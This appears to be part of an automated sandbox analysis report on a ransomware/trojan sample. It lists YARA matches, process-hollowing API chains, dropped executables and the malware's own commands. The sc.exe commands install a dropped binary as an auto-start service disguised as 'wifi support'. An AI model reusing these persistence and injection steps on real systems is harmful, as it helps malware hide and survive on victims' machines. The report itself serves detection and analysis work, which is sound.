                      Source: Yara matchFile source: 26.2.qxoxlxqh.exe.db0000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 26.2.qxoxlxqh.exe.db0000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 26.2.qxoxlxqh.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 26.2.qxoxlxqh.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.6902.exe.5e0e50.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 26.2.qxoxlxqh.exe.d50e50.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000000B.00000003.814707254.0000000000600000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.840468381.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001A.00000002.850016785.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.840877989.00000000005E0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001A.00000002.850501152.0000000000D50000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001D.00000002.1062344530.00000000007E0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001A.00000002.850539504.0000000000DB0000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001A.00000003.846397330.0000000000D70000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: 6902.exe PID: 1716, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: qxoxlxqh.exe PID: 5788, type: MEMORYSTR

                      System Summary:

                      barindex
                      Source: C:\Users\user\Desktop\V91yW08J6p.exeCode function: 0_2_0040BC4D
                      Source: C:\Users\user\Desktop\V91yW08J6p.exeCode function: 0_2_004114F7
                      Source: C:\Users\user\Desktop\V91yW08J6p.exeCode function: 0_2_004108BB
                      Source: C:\Users\user\Desktop\V91yW08J6p.exeCode function: 0_2_00410DFF
                      Source: C:\Users\user\Desktop\V91yW08J6p.exeCode function: 0_2_00412258
                      Source: C:\Users\user\Desktop\V91yW08J6p.exeCode function: 0_2_0040425E
                      Source: C:\Users\user\Desktop\V91yW08J6p.exeCode function: 0_2_00410377
                      Source: C:\Users\user\Desktop\V91yW08J6p.exeCode function: 0_2_00543253
                      Source: C:\Users\user\Desktop\V91yW08J6p.exeCode function: 0_2_005431FF
                      Source: C:\Users\user\Desktop\V91yW08J6p.exeCode function: 2_2_00402A5F
                      Source: C:\Users\user\Desktop\V91yW08J6p.exeCode function: 2_2_00402AB3
                      Source: C:\Users\user\Desktop\V91yW08J6p.exeCode function: 2_1_00402A5F
                      Source: C:\Users\user\Desktop\V91yW08J6p.exeCode function: 2_1_00402AB3
                      Source: C:\Users\user\AppData\Roaming\adiicvbCode function: 5_2_00613253
                      Source: C:\Users\user\AppData\Roaming\adiicvbCode function: 5_2_006131FF
                      Source: C:\Users\user\AppData\Roaming\adiicvbCode function: 6_2_00402A5F
                      Source: C:\Users\user\AppData\Roaming\adiicvbCode function: 6_2_00402AB3
                      Source: C:\Users\user\AppData\Local\Temp\7CCD.exeCode function: 7_2_004027CA
                      Source: C:\Users\user\AppData\Local\Temp\7CCD.exeCode function: 7_2_00401FF1
                      Source: C:\Users\user\AppData\Local\Temp\7CCD.exeCode function: 7_2_0040158E
                      Source: C:\Users\user\AppData\Local\Temp\7CCD.exeCode function: 7_2_004015A6
                      Source: C:\Users\user\AppData\Local\Temp\7CCD.exeCode function: 7_2_004015BC
                      Source: C:\Users\user\AppData\Local\Temp\7CCD.exeCode function: 7_2_00411065
                      Source: C:\Users\user\AppData\Local\Temp\7CCD.exeCode function: 7_2_00412A02
                      Source: C:\Users\user\AppData\Local\Temp\7CCD.exeCode function: 7_2_0040CAC5
                      Source: C:\Users\user\AppData\Local\Temp\7CCD.exeCode function: 7_2_00410B21
                      Source: C:\Users\user\AppData\Local\Temp\7CCD.exeCode function: 7_2_004115A9
                      Source: C:\Users\user\AppData\Local\Temp\7CCD.exeCode function: 7_2_0048160C
                      Source: C:\Users\user\AppData\Local\Temp\7CCD.exeCode function: 7_2_004815DE
                      Source: C:\Users\user\AppData\Local\Temp\7CCD.exeCode function: 7_2_004815F6
                      Source: C:\Users\user\AppData\Local\Temp\76E7.exeCode function: 8_2_00410800
                      Source: C:\Users\user\AppData\Local\Temp\76E7.exeCode function: 8_2_00411280
                      Source: C:\Users\user\AppData\Local\Temp\76E7.exeCode function: 8_2_004103F0
                      Source: C:\Users\user\AppData\Local\Temp\76E7.exeCode function: 8_2_004109F0
                      Source: C:\Users\user\AppData\Local\Temp\76E7.exeCode function: 8_2_020E0640
                      Source: C:\Users\user\AppData\Local\Temp\76E7.exeCode function: 8_2_020E0C40
                      Source: C:\Users\user\AppData\Local\Temp\76E7.exeCode function: 8_2_020E0A50
                      Source: C:\Users\user\AppData\Local\Temp\76E7.exeCode function: 8_2_020E14D0
                      Source: C:\Users\user\AppData\Local\Temp\6902.exeCode function: 11_2_0040C913
                      Source: C:\Users\user\AppData\Local\Temp\768F.exeCode function: 13_2_00D196F0
                      Source: C:\Users\user\AppData\Local\Temp\768F.exeCode function: 13_2_00D10470
                      Source: C:\Users\user\AppData\Local\Temp\768F.exeCode function: 13_2_00D10460
                      Source: C:\Users\user\AppData\Local\Temp\768F.exeCode function: 13_2_04C21810
                      Source: C:\Users\user\AppData\Local\Temp\768F.exeCode function: 13_2_04C253F8
                      Source: C:\Users\user\AppData\Local\Temp\768F.exeCode function: 13_2_04C20448
                      Source: C:\Users\user\AppData\Local\Temp\768F.exeCode function: 13_2_04C22E48
                      Source: C:\Users\user\AppData\Local\Temp\768F.exeCode function: 13_2_04C3A430
                      Source: C:\Users\user\AppData\Local\Temp\768F.exeCode function: 13_2_04C31528
                      Source: C:\Users\user\AppData\Local\Temp\768F.exeCode function: 13_2_04C367B8
                      Source: C:\Users\user\AppData\Local\Temp\768F.exeCode function: 13_2_04C34758
                      Source: C:\Users\user\AppData\Local\Temp\768F.exeCode function: 13_2_04C32C88
                      Source: C:\Users\user\AppData\Local\Temp\768F.exeCode function: 13_2_04C3AD68
                      Source: C:\Users\user\AppData\Local\Temp\768F.exeCode function: 13_2_04C308B0
                      Source: C:\Users\user\AppData\Local\Temp\768F.exeCode function: 13_2_04C35B58
                      Source: C:\Users\user\AppData\Local\Temp\768F.exeCode function: 13_2_04C3B638
                      Source: C:\Users\user\AppData\Local\Temp\768F.exeCode function: 13_2_04C390D3
                      Source: C:\Windows\SysWOW64\ejdjvovs\qxoxlxqh.exeCode function: 26_2_0040C913
                      Source: C:\Users\user\AppData\Local\Temp\6902.exeCode function: 11_2_00401280 ShellExecuteExW,lstrlenW,GetStartupInfoW,CreateProcessWithLogonW,WaitForSingleObject,CloseHandle,CloseHandle,GetLastError,GetLastError,
                      Source: V91yW08J6p.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: V91yW08J6p.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: V91yW08J6p.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: E6AF.exe.3.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: E6AF.exe.3.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: E6AF.exe.3.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: FF1A.exe.3.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: FF1A.exe.3.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: FF1A.exe.3.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 2D5.exe.3.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 2D5.exe.3.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 2D5.exe.3.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 1365.exe.3.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 28B3.exe.3.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 28B3.exe.3.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 7CCD.exe.3.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 7CCD.exe.3.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 7CCD.exe.3.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 76E7.exe.3.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 76E7.exe.3.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 76E7.exe.3.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 6902.exe.3.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 6902.exe.3.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 6902.exe.3.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: vsiicvb.3.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: vsiicvb.3.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: vsiicvb.3.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: adiicvb.3.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: adiicvb.3.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: adiicvb.3.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: qxoxlxqh.exe.11.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: qxoxlxqh.exe.11.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: qxoxlxqh.exe.11.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: C:\Windows\explorer.exeSection loaded: taskschd.dll
                      Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Windows\explorer.exeSection loaded: webio.dll
                      Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Windows\explorer.exeSection loaded: dpapi.dll
                      Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Users\user\AppData\Local\Temp\768F.exeSection loaded: mscorjit.dll
                      Source: V91yW08J6p.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
                      Source: 00000026.00000000.927572070.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
                      Source: 00000026.00000000.915798638.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
                      Source: 00000026.00000000.924493030.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
                      Source: 00000026.00000000.918689335.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
                      Source: 00000026.00000001.929538052.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
                      Source: 00000026.00000000.922458766.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
                      Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\SysWOW64\ejdjvovs\Jump to behavior
                      Source: C:\Users\user\Desktop\V91yW08J6p.exeCode function: String function: 00404824 appears 44 times
                      Source: C:\Users\user\AppData\Local\Temp\6902.exeCode function: String function: 0040EE2A appears 40 times
                      Source: C:\Users\user\AppData\Local\Temp\6902.exeCode function: String function: 00402544 appears 53 times
                      Source: C:\Users\user\AppData\Local\Temp\76E7.exeCode function: String function: 004048D0 appears 460 times
                      Source: C:\Users\user\Desktop\V91yW08J6p.exeCode function: 0_2_00540110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess,
                      Source: C:\Users\user\Desktop\V91yW08J6p.exeCode function: 2_2_00401962 Sleep,NtTerminateProcess,
                      Source: C:\Users\user\Desktop\V91yW08J6p.exeCode function: 2_2_0040196D Sleep,NtTerminateProcess,
                      Source: C:\Users\user\Desktop\V91yW08J6p.exeCode function: 2_2_00402000 NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\Desktop\V91yW08J6p.exeCode function: 2_2_0040250A NtEnumerateKey,NtEnumerateKey,NtClose,
                      Source: C:\Users\user\Desktop\V91yW08J6p.exeCode function: 2_2_00401A0B NtTerminateProcess,
                      Source: C:\Users\user\Desktop\V91yW08J6p.exeCode function: 2_2_0040201A NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\Desktop\V91yW08J6p.exeCode function: 2_2_0040201E NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\Desktop\V91yW08J6p.exeCode function: 2_2_0040202D NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\Desktop\V91yW08J6p.exeCode function: 2_2_00402084 LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\Desktop\V91yW08J6p.exeCode function: 2_2_00402491 NtOpenKey,
                      Source: C:\Users\user\Desktop\V91yW08J6p.exeCode function: 2_1_00402000 NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\Desktop\V91yW08J6p.exeCode function: 2_1_0040250A NtEnumerateKey,NtEnumerateKey,NtClose,
                      Source: C:\Users\user\Desktop\V91yW08J6p.exeCode function: 2_1_0040201A NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\Desktop\V91yW08J6p.exeCode function: 2_1_0040201E NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\Desktop\V91yW08J6p.exeCode function: 2_1_0040202D NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\Desktop\V91yW08J6p.exeCode function: 2_1_00402084 LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\Desktop\V91yW08J6p.exeCode function: 2_1_00402491 NtOpenKey,
                      Source: C:\Users\user\AppData\Roaming\adiicvbCode function: 5_2_00610110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess,
                      Source: C:\Users\user\AppData\Roaming\adiicvbCode function: 6_2_00401962 Sleep,NtTerminateProcess,
                      Source: C:\Users\user\AppData\Roaming\adiicvbCode function: 6_2_0040196D Sleep,NtTerminateProcess,
                      Source: C:\Users\user\AppData\Roaming\adiicvbCode function: 6_2_00402000 NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\AppData\Roaming\adiicvbCode function: 6_2_0040250A NtEnumerateKey,NtEnumerateKey,NtClose,
                      Source: C:\Users\user\AppData\Roaming\adiicvbCode function: 6_2_00401A0B NtTerminateProcess,
                      Source: C:\Users\user\AppData\Roaming\adiicvbCode function: 6_2_0040201A NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\AppData\Roaming\adiicvbCode function: 6_2_0040201E NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\AppData\Roaming\adiicvbCode function: 6_2_0040202D NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\AppData\Roaming\adiicvbCode function: 6_2_00402084 LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\AppData\Roaming\adiicvbCode function: 6_2_00402491 NtOpenKey,
                      Source: C:\Users\user\AppData\Local\Temp\7CCD.exeCode function: 7_2_0040193B Sleep,NtTerminateProcess,
                      Source: C:\Users\user\AppData\Local\Temp\7CCD.exeCode function: 7_2_00401947 Sleep,NtTerminateProcess,
                      Source: C:\Users\user\AppData\Local\Temp\7CCD.exeCode function: 7_2_0040174C NtMapViewOfSection,NtMapViewOfSection,Sleep,NtTerminateProcess,
                      Source: C:\Users\user\AppData\Local\Temp\7CCD.exeCode function: 7_2_00401951 Sleep,NtTerminateProcess,
                      Source: C:\Users\user\AppData\Local\Temp\7CCD.exeCode function: 7_2_00401FF1 NtQuerySystemInformation,NtQuerySystemInformation,
                      Source: C:\Users\user\AppData\Local\Temp\7CCD.exeCode function: 7_2_004016FD NtMapViewOfSection,NtMapViewOfSection,
                      Source: C:\Users\user\AppData\Local\Temp\7CCD.exeCode function: 7_2_0040158E NtMapViewOfSection,NtMapViewOfSection,
                      Source: C:\Users\user\AppData\Local\Temp\7CCD.exeCode function: 7_2_004015A6 NtMapViewOfSection,NtMapViewOfSection,
                      Source: C:\Users\user\AppData\Local\Temp\7CCD.exeCode function: 7_2_004015BC NtMapViewOfSection,NtMapViewOfSection,
                      Source: C:\Users\user\AppData\Local\Temp\6902.exeCode function: 11_2_00408E26: CreateFileW,DeviceIoControl,CloseHandle,
                      Source: V91yW08J6p.exeStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                      Source: E6AF.exe.3.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                      Source: FF1A.exe.3.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                      Source: 2D5.exe.3.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                      Source: 2941.exe.3.drStatic PE information: Resource name: RT_RCDATA type: COM executable for DOS
                      Source: 7CCD.exe.3.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                      Source: 76E7.exe.3.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                      Source: 6902.exe.3.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                      Source: vsiicvb.3.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                      Source: adiicvb.3.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                      Source: qxoxlxqh.exe.11.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                      Source: 1365.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                      Source: 1365.exe.3.drStatic PE information: Section: .edata ZLIB complexity 0.999570876842
                      Source: 2941.exe.3.drStatic PE information: Section: .rsrc ZLIB complexity 0.996257752863
                      Source: V91yW08J6p.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Windows\SysWOW64\ejdjvovs\qxoxlxqh.exeEvasive API call chain: GetCommandLine,DecisionNodes,ExitProcess
                      Source: C:\Users\user\AppData\Local\Temp\6902.exeEvasive API call chain: GetCommandLine,DecisionNodes,ExitProcess
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\adiicvbJump to behavior
                      Source: classification engineClassification label: mal100.rans.troj.evad.winEXE@52/19@109/29
                      Source: C:\Users\user\AppData\Local\Temp\6902.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\6902.exeCode function: 11_2_00409A6B EntryPoint,SetErrorMode,SetErrorMode,SetErrorMode,SetUnhandledExceptionFilter,GetModuleHandleA,GetModuleFileNameA,GetCommandLineA,lstrlenA,ExitProcess,GetTempPathA,lstrcpyA,lstrcatA,lstrcatA,GetFileAttributesExA,DeleteFileA,GetEnvironmentVariableA,lstrcpyA,lstrlenA,RegOpenKeyExA,RegSetValueExA,RegCloseKey,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,wsprintfA,lstrcatA,lstrcatA,CreateProcessA,DeleteFileA,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,GetCommandLineA,lstrlenA,StartServiceCtrlDispatcherA,DeleteFileA,GetLastError,Sleep,DeleteFileA,CreateThread,CreateThread,WSAStartup,CreateThread,Sleep,Sleep,GetTickCount,GetTickCount,GetTickCount,Sleep,
                      Source: C:\Windows\SysWOW64\ejdjvovs\qxoxlxqh.exeCode function: 26_2_00409A6B EntryPoint,SetErrorMode,SetErrorMode,SetErrorMode,SetUnhandledExceptionFilter,GetModuleHandleA,GetModuleFileNameA,GetCommandLineA,lstrlenA,ExitProcess,GetTempPathA,lstrcpyA,lstrcatA,lstrcatA,GetFileAttributesExA,DeleteFileA,GetEnvironmentVariableA,lstrcpyA,lstrlenA,RegOpenKeyExA,RegSetValueExA,RegCloseKey,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,wsprintfA,lstrcatA,lstrcatA,CreateProcessA,DeleteFileA,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,GetCommandLineA,lstrlenA,StartServiceCtrlDispatcherA,DeleteFileA,GetLastError,Sleep,DeleteFileA,CreateThread,CreateThread,WSAStartup,CreateThread,Sleep,Sleep,GetTickCount,GetTickCount,GetTickCount,Sleep,
                      Source: C:\Users\user\AppData\Local\Temp\6902.exeCode function: 11_2_00409A6B EntryPoint,SetErrorMode,SetErrorMode,SetErrorMode,SetUnhandledExceptionFilter,GetModuleHandleA,GetModuleFileNameA,GetCommandLineA,lstrlenA,ExitProcess,GetTempPathA,lstrcpyA,lstrcatA,lstrcatA,GetFileAttributesExA,DeleteFileA,GetEnvironmentVariableA,lstrcpyA,lstrlenA,RegOpenKeyExA,RegSetValueExA,RegCloseKey,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,wsprintfA,lstrcatA,lstrcatA,CreateProcessA,DeleteFileA,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,GetCommandLineA,lstrlenA,StartServiceCtrlDispatcherA,DeleteFileA,GetLastError,Sleep,DeleteFileA,CreateThread,CreateThread,WSAStartup,CreateThread,Sleep,Sleep,GetTickCount,GetTickCount,GetTickCount,Sleep,
                      Source: V91yW08J6p.exeReversingLabs: Detection: 46%
                      Source: C:\Users\user\Desktop\V91yW08J6p.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: unknownProcess created: C:\Users\user\Desktop\V91yW08J6p.exe "C:\Users\user\Desktop\V91yW08J6p.exe"
                      Source: C:\Users\user\Desktop\V91yW08J6p.exeProcess created: C:\Users\user\Desktop\V91yW08J6p.exe "C:\Users\user\Desktop\V91yW08J6p.exe"
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\adiicvb C:\Users\user\AppData\Roaming\adiicvb
                      Source: C:\Users\user\AppData\Roaming\adiicvbProcess created: C:\Users\user\AppData\Roaming\adiicvb C:\Users\user\AppData\Roaming\adiicvb
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\7CCD.exe C:\Users\user\AppData\Local\Temp\7CCD.exe
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\76E7.exe C:\Users\user\AppData\Local\Temp\76E7.exe
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\6902.exe C:\Users\user\AppData\Local\Temp\6902.exe
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\768F.exe C:\Users\user\AppData\Local\Temp\768F.exe
                      Source: C:\Users\user\AppData\Local\Temp\6902.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\ejdjvovs\
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\AppData\Local\Temp\6902.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\qxoxlxqh.exe" C:\Windows\SysWOW64\ejdjvovs\
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\AppData\Local\Temp\6902.exeProcess created: C:\Windows\SysWOW64\sc.exe C:\Windows\System32\sc.exe" create ejdjvovs binPath= "C:\Windows\SysWOW64\ejdjvovs\qxoxlxqh.exe /d\"C:\Users\user\AppData\Local\Temp\6902.exe\"" type= own start= auto DisplayName= "wifi support
                      Source: C:\Windows\SysWOW64\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\AppData\Local\Temp\6902.exeProcess created: C:\Windows\SysWOW64\sc.exe C:\Windows\System32\sc.exe" description ejdjvovs "wifi internet conection
                      Source: C:\Windows\SysWOW64\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\AppData\Local\Temp\6902.exeProcess created: C:\Windows\SysWOW64\sc.exe "C:\Windows\System32\sc.exe" start ejdjvovs
                      Source: C:\Users\user\AppData\Local\Temp\768F.exeProcess created: C:\Users\user\AppData\Local\Temp\768F.exe C:\Users\user\AppData\Local\Temp\768F.exe
